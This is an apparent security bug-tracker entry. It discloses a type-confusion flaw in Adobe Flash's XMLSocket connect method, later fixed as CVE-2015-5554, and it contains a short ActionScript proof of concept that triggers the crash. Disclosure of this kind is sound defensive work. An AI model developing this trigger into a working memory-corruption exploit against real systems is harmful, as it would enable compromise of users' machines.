New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Aug 2015
Cc:



Sign in to add a comment
Adobe Flash: XMLSocket Destructor Does Not Get Cleared Before Setting User Data in connect (Part 2)
Project Member Reported by natashenka@google.com, May 29 2015 Back to list
This issue is a variant of  issue 192 , which the fix did not address.

If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.

A PoC is as follows:

class subsocket extends flash.display.BitmapData{
	

	public function subsocket(){
			
	var n = {valueOf : func};
    this.valueOf = func;
	var x = new XMLSocket();

	x.connect.call(this, "127.0.0.1", this);

}

function func(){

	if(this){
		}
	this.__proto__ = {}; 
	this.__proto__.__constructor__ = flash.display.BitmapData;
	super(10, 10, true, 10);
	return 80;
	}
		
		
}
	

A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
fr.fla
5.3 KB Download
subsocket.as
445 bytes Download
fr.swf
1.1 KB Download
Project Member Comment 1 by natashenka@google.com, Jun 1 2015
This is PSIRT-3766
Project Member Comment 2 by natashenka@google.com, Aug 11 2015
Labels: CVE-2015-5554 Id-3766
Status: Fixed
Project Member Comment 3 by natashenka@google.com, Aug 18 2015
Labels: -Restrict-View-Commit
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html
Sign in to add a comment